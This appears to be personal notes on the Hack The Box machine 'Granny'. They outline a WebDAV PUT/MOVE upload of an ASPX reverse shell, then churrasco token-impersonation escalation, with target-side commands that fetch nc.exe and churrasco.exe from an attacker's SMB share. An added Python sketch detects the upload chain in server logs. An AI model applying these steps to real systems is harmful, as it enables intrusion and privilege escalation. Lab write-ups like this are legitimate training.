Granny
webdav
- HTTP PUT method enabled
- davtest to see what can be uploaded
- curl to PUT a txt file
- curl to MOVE the txt file to aspx
- run the aspx to get a reverse shell
- whoami /priv
- token impersonation for privilege escalation
- old box, hence churrasco for privilege escalation
- SMB for file transfer

The simple shell misbehaves and exits frequently, hence go with a meterpreter shell to stabilize the shell.

What did we learn here:
- SMB file transfer
- SE token impersonation
- PUT method
- MOVE method
- WebDAV enumeration
Refer to the 0xdf writeup along the way.

Addons :: What is WebDAV?

Web Distributed Authoring and Versioning (WebDAV) is an HTTP extension designed to allow people to create and modify web sites using HTTP. It was originally started in 1996, when this didn’t seem like a terrible idea. I don’t see that often on recent HTB machines, but I did come across it in PWK/OSCP.

WebDAV is a protocol whose basic functionality includes enabling users to share, copy, move and edit files through a web server. It allows a web server to appear as a network share.

more on it here ::

WebDAV is on a huge decline.
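The upload chain in the notes above (PUT a .txt, MOVE it to .aspx, then request it) is visible in the web server's access log. The sketch below is an added example, not part of the original notes: it scans W3C-style log lines for that sequence. The sample lines, field order and function names are constructed for illustration, and it assumes the log does not record the MOVE destination, so the renamed file is matched by its stem.

```python
# Added example: flags the PUT -> MOVE -> GET upload chain in IIS-style logs.
# SAMPLE_LOG is constructed for illustration; the field order is an assumption.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-01 10:00:01 192.0.2.10 OPTIONS / 200
2024-01-01 10:00:05 192.0.2.10 PUT /notes.txt 201
2024-01-01 10:00:09 192.0.2.10 MOVE /notes.txt 201
2024-01-01 10:00:12 192.0.2.10 GET /notes.aspx 200
2024-01-01 10:01:00 198.51.100.7 GET /index.htm 200
2024-01-01 10:02:00 198.51.100.7 PUT /report.txt 403
"""

SCRIPT_EXTS = (".aspx", ".asp", ".ashx", ".asmx")

def parse(log_text):
    """Yield one dict per request, naming columns from the #Fields header."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def stem(path):
    """'/notes.txt' -> '/notes' (the log does not record the MOVE target)."""
    return path.rsplit(".", 1)[0]

def find_upload_then_rename(log_text):
    """Alert on a successful PUT followed by a MOVE of the same path from the
    same client; note a later GET of a script file sharing that stem."""
    uploaded, moved, alerts = set(), {}, []
    for rec in parse(log_text):
        ip, method = rec["c-ip"], rec["cs-method"].upper()
        path = rec["cs-uri-stem"].lower()
        if not rec["sc-status"].startswith("2"):
            continue  # ignore rejected requests
        if method == "PUT":
            uploaded.add((ip, path))
        elif method == "MOVE" and (ip, path) in uploaded:
            moved[(ip, stem(path))] = len(alerts)
            alerts.append({"client": ip, "uploaded": path, "executed": None})
        elif method == "GET" and path.endswith(SCRIPT_EXTS):
            if (ip, stem(path)) in moved:
                alerts[moved[(ip, stem(path))]]["executed"] = path
    return alerts
```

An alert with `executed` still set to `None` means the file was uploaded and renamed but no matching script request has been seen yet.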
quick SMB server spawn
on attacker
^ the name to give this share, followed by the directory to share; keep the files to be shared in this (.) directory
on target cmd shell
copy \\attackerip\sharky\nc.exe .
copy \\attackerip\sharky\churassco.exe chur.exe
^output filename
churrasco
output of the above command goes here ..........
SeImpersonatePrivilege Enabled
SeImpersonatePrivilege is one I know to look out for.
For modern boxes, that means a potato exploit (juicy, lonely, rotten). But for 2003, it’s better to start with churrasco. [If it does not work, then move to the others.]
we need nc as well on the box for this to work so transfer both of the exes together
Usage::
^ another exe you want to execute, followed by the attacker IP and port
get a listener up and running on the attacker
get exe from here ::